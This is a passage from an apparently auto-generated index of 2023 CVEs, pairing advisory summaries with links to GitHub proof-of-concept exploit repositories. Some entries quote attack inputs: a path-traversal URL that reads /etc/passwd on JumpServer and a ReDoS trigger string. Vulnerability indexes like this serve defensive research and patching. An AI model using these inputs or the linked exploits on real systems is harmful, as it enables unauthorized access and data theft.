An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.

- [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect)

### CVE-2023-41362 (2023-08-29)

MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP.

- [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE)

### CVE-2023-41425 (2023-11-07)

Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

- [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425)
- [charlesgargasson/CVE-2023-41425](https://github.com/charlesgargasson/CVE-2023-41425)
- [insomnia-jacob/CVE-2023-41425](https://github.com/insomnia-jacob/CVE-2023-41425)
- [tiyeume25112004/CVE-2023-41425](https://github.com/tiyeume25112004/CVE-2023-41425)
- [thefizzyfish/CVE-2023-41425-wonderCMS_RCE](https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE)
- [Raffli-Dev/CVE-2023-41425](https://github.com/Raffli-Dev/CVE-2023-41425)
- [duck-sec/CVE-2023-41425](https://github.com/duck-sec/CVE-2023-41425)
- [TanveerS1ngh/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425](https://github.com/TanveerS1ngh/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425)
- [h3athen/CVE-2023-41425](https://github.com/h3athen/CVE-2023-41425)

### CVE-2023-41436 (2023-09-15)

Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component.

- [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content)

### CVE-2023-41474 (2024-01-25)

Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.

- [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474)

### CVE-2023-41507 (2023-09-05)

Super Store Finder v3.6 was discovered to contain multiple SQL injection vulnerabilities in the store locator component via the products, distance, lat, and lng parameters.

- [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507)

### CVE-2023-41508 (2023-09-05)

A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.

- [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508)

### CVE-2023-41533
- [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533)

### CVE-2023-41534
- [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534)

### CVE-2023-41535
- [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535)

### CVE-2023-41564 (2023-09-08)

An arbitrary file upload vulnerability in the Upload Asset function of Cockpit CMS v2.6.3 allows attackers to execute arbitrary code via uploading a crafted .shtml file.

- [sota70/cve-2023-41564-research](https://github.com/sota70/cve-2023-41564-research)

### CVE-2023-41575 (2023-09-08)

Multiple stored cross-site scripting (XSS) vulnerabilities in /bbdms/sign-up.php of Blood Bank & Donor Management v2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name, Message, or Address parameters.

- [soundarkutty/Stored-xss](https://github.com/soundarkutty/Stored-xss)

### CVE-2023-41592 (2023-09-14)

Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.

- [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2)
- [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1)
- [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3)

### CVE-2023-41593 (2023-09-11)

Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters.

- [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE)

### CVE-2023-41613 (2023-12-04)

EzViz Studio v2.2.0 is vulnerable to DLL hijacking.

- [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613)

### CVE-2023-41623 (2023-12-12)

Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.

- [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE)

### CVE-2023-41646 (2023-09-07)

Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/

- [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646)

### CVE-2023-41717 (2023-08-31)

Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions.

- [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717)

### CVE-2023-41772 (2023-10-10)

Win32k Elevation of Privilege Vulnerability

- [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772)

### CVE-2023-41892 (2023-09-13)

Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.

- [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892)
- [0xfalafel/CraftCMS_CVE-2023-41892](https://github.com/0xfalafel/CraftCMS_CVE-2023-41892)
- [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit)
- [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892)
- [CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892](https://github.com/CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892)

### CVE-2023-41991 (2023-09-21)

A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

- [Zenyith/CVE-2023-41991](https://github.com/Zenyith/CVE-2023-41991)

### CVE-2023-41993 (2023-09-21)

The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

- [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993)
- [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test)
- [0x06060606/CVE-2023-41993](https://github.com/0x06060606/CVE-2023-41993)
- [Mangaia/cve-test](https://github.com/Mangaia/cve-test)
- [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993)

### CVE-2023-42115 (2024-05-03)

Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17434.

- [kirinse/cve-2023-42115](https://github.com/kirinse/cve-2023-42115)

### CVE-2023-42222 (2023-09-28)

WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.

- [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222)

### CVE-2023-42283 (2023-11-07)

Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

- [andreysanyuk/CVE-2023-42283](https://github.com/andreysanyuk/CVE-2023-42283)

### CVE-2023-42284 (2023-11-07)

Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

- [andreysanyuk/CVE-2023-42284](https://github.com/andreysanyuk/CVE-2023-42284)

### CVE-2023-42326 (2023-11-14)

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

- [bl4ckarch/pf-pwnme](https://github.com/bl4ckarch/pf-pwnme)
- [Farzan-Kh/CVE-2023-42326](https://github.com/Farzan-Kh/CVE-2023-42326)

### CVE-2023-42362 (2023-09-14)

An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.

- [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362)

### CVE-2023-42413
- [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413)

### CVE-2023-42426 (2023-09-25)

Cross-site scripting (XSS) vulnerability in Froala Froala Editor v.4.1.1 allows remote attackers to execute arbitrary code via the 'Insert link' parameter in the 'Insert Image' component.

- [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426)

### CVE-2023-42442 (2023-09-15)

JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can be downloaded without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The API `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes are set to `[RBACPermission | IsSessionAssignee]`; the relation is OR, so any matched permission will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the API `$HOST/api/v1/terminal/sessions/?limit=1`. The expected HTTP response code is 401 (`not_authenticated`).

- [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442)
- [tarihub/blackjump](https://github.com/tarihub/blackjump)
- [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442)

### CVE-2023-42468 (2023-09-13)

The com.cutestudio.colordialer application through 2.1.8-2 for Android allows a remote attacker to initiate phone calls without user consent, because of improper export of the com.cutestudio.dialer.activities.DialerActivity component. A third-party application (without any permissions) can craft an intent targeting com.cutestudio.dialer.activities.DialerActivity via the android.intent.action.CALL action in conjunction with a tel: URI, thereby placing a phone call.

- [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer)

### CVE-2023-42469 (2023-09-13)

The com.full.dialer.top.secure.encrypted application through 1.0.1 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.full.dialer.top.secure.encrypted.activities.DialerActivity component.

- [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted)

### CVE-2023-42470 (2023-09-11)

The Imou Life com.mm.android.smartlifeiot application through 6.8.0 for Android allows Remote Code Execution via a crafted intent to an exported component. This relates to the com.mm.android.easy4ip.MainActivity activity. JavaScript execution is enabled in the WebView, and direct web content loading occurs.

- [actuator/imou](https://github.com/actuator/imou)

### CVE-2023-42471 (2023-09-11)

The wave.ai.browser application through 1.0.35 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. It contains a manifest entry that exports the wave.ai.browser.ui.splash.SplashScreen activity. This activity uses a WebView component to display web content and doesn't adequately validate or sanitize the URI or any extra data passed in the intent by a third party application (with no permissions).

- [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser)

### CVE-2023-42789 (2024-03-12)

An out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows an attacker to execute unauthorized code or commands via specially crafted HTTP requests.

- [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789)

### CVE-2023-42793 (2023-09-19)

In JetBrains TeamCity before 2023.05.4, an authentication bypass leading to RCE on TeamCity Server was possible.

- [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793)
- [whoamins/CVE-2023-42793](https://github.com/whoamins/CVE-2023-42793)
- [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793)
- [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC)
- [StanleyJobsonAU/GhostTown](https://github.com/StanleyJobsonAU/GhostTown)
- [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793)
- [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793)
- [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793)
- [HusenjanDev/CVE-2023-42793](https://github.com/HusenjanDev/CVE-2023-42793)
- [FlojBoj/CVE-2023-42793](https://github.com/FlojBoj/CVE-2023-42793)
- [SwiftSecur/teamcity-exploit-cve-2023-42793](https://github.com/SwiftSecur/teamcity-exploit-cve-2023-42793)

### CVE-2023-42819 (2023-09-26)

JumpServer is an open source bastion host. Logged-in users can access and modify the contents of any file on the system. A user can use the 'Job-Template' menu and create a playbook named 'test'. Get the playbook id from the detail page, like 'e0adabef-c38f-492d-bd92-832bacc3df5f'. An attacker can exploit the directory traversal flaw using the provided URL to access and retrieve the contents of the file: `https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd`. A similar method to modify the file content is also present. This issue has been addressed in version 3.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819)

### CVE-2023-42820 (2023-09-26)

JumpServer is an open source bastion host. This vulnerability is due to exposing the random number seed to the API, potentially allowing the randomly generated verification codes to be replayed, which could lead to password resets. If MFA is enabled, users are not affected. Users not using local authentication are also not affected. Users are advised to upgrade to either version 2.28.19 or to 3.6.5. There are no known workarounds for this issue.

- [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820)
- [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820)

### CVE-2023-42860 (2024-02-21)

A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system.

- [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860)

### CVE-2023-42931 (2024-03-28)

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication.

- [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931)

### CVE-2023-43040 (2024-05-13)

IBM Spectrum Fusion HCI 2.5.2 through 2.7.2 could allow an attacker to perform unauthorized actions in RGW for Ceph due to improper bucket access. IBM X-Force ID: 266807.

- [riza/CVE-2023-43040](https://github.com/riza/CVE-2023-43040)

### CVE-2023-43115 (2023-09-18)

In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. NOTE: it is a documented risk that the IJS server can be specified on a gs command line (the IJS device inherently must execute a command to start the IJS server).

- [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115)

### CVE-2023-43144 (2023-09-22)

Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php.

- [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144)

### CVE-2023-43147 (2023-10-12)

PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.

- [MinoTauro2020/CVE-2023-43147](https://github.com/MinoTauro2020/CVE-2023-43147)

### CVE-2023-43148 (2023-10-12)

SPA-Cart 1.9.0.3 has a Cross Site Request Forgery (CSRF) vulnerability that allows a remote attacker to delete all accounts.

- [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148)

### CVE-2023-43149 (2023-10-12)

SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.

- [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149)

### CVE-2023-43154 (2023-09-26)

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

- [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC)

### CVE-2023-43177 (2023-11-17)

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

- [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177)

### CVE-2023-43208 (2023-10-26)

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.

- [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT)
- [jakabakos/CVE-2023-43208-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc)
- [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT)

### CVE-2023-43261 (2023-10-04)

An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.

- [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261)

### CVE-2023-43263 (2023-09-26)

A Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component.

- [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263)

### CVE-2023-43284 (2023-10-05)

D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 100A53DBR-Retail devices allow an authenticated remote attacker to execute arbitrary code via an unspecified manipulation of the QoS POST parameter.

- [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284)

### CVE-2023-43317 (2024-01-24)

An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.

- [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317)

### CVE-2023-43318 (2024-03-05)

TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests.

- [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318)

### CVE-2023-43323 (2023-09-28)

mooSocial 3.1.8 is vulnerable to external service interaction in the post function. When executed, the server sends an HTTP and DNS request to an external server. Multiple parameters are affected: messageText, data[wall_photo], data[userShareVideo] and data[userShareLink].

- [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323)

### CVE-2023-43325 (2023-09-25)

A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.

- [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325)

### CVE-2023-43326 (2023-09-25)

A reflected cross-site scripting (XSS) vulnerability exists in multiple URLs of mooSocial v3.1.8 and allows attackers to steal a user's session cookies and impersonate their account via a crafted URL.

- [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326)

### CVE-2023-43339 (2023-09-25)

Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components.

- [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation)

### CVE-2023-43340 (2023-10-19)

Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters.

- [sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options](https://github.com/sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options)

### CVE-2023-43341 (2023-10-19)

Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the uid parameter.

- [sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-](https://github.com/sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-)

### CVE-2023-43342 (2023-10-19)

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component.

- [sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend](https://github.com/sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend)

### CVE-2023-43343 (2023-10-05)

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component.

- [sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files](https://github.com/sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files)

### CVE-2023-43344 (2023-10-19)

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component.

- [sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description](https://github.com/sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description)

### CVE-2023-43345 (2023-10-19)

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component.

- [sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content)

### CVE-2023-43346 (2023-10-20)

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component.

- [sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend](https://github.com/sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend)

### CVE-2023-43352 (2023-10-26)

An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.

- [sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content](https://github.com/sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content)

### CVE-2023-43353 (2023-10-20)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component.

- [sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra](https://github.com/sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra)

### CVE-2023-43354 (2023-10-20)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component.

- [sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension](https://github.com/sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension)

### CVE-2023-43355 (2023-10-20)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component.

- [sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user](https://github.com/sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user)

### CVE-2023-43356 (2023-10-20)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component.

- [sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings](https://github.com/sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings)

### CVE-2023-43357 (2023-10-20)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component.

- [sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut](https://github.com/sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut)

### CVE-2023-43358 (2023-10-23)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component.

- [sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News](https://github.com/sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News)

### CVE-2023-43359 (2023-10-19)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component.

- [sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager](https://github.com/sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager)

### CVE-2023-43360 (2023-10-24)

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory parameter in the File Picker Menu component.

- [sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension](https://github.com/sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension)

### CVE-2023-43364 (2023-12-12)

main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution.

- [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE)

### CVE-2023-43481 (2023-12-27)

An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component.

- [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser)

### CVE-2023-43482 (2024-02-06)

A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

- [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482)

### CVE-2023-43494 (2023-09-20)

Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.

- [mqxmm/CVE-2023-43494](https://github.com/mqxmm/CVE-2023-43494)

### CVE-2023-43622 (2023-10-23)

An attacker, opening an HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern. This has been fixed in version 2.4.58, so that such connections are terminated properly after the configured connection timeout.

This issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.

Users are recommended to upgrade to version 2.4.58, which fixes the issue.

- [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622)

### CVE-2023-43646 (2023-09-26)

get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [200101WhoAmI/CVE-2023-43646](https://github.com/200101WhoAmI/CVE-2023-43646)

### CVE-2023-43654 (2023-09-28)

TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.

- [OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker)
- [OligoCyberSecurity/CVE-2023-43654](https://github.com/OligoCyberSecurity/CVE-2023-43654)

### CVE-2023-43667 (2023-10-16)

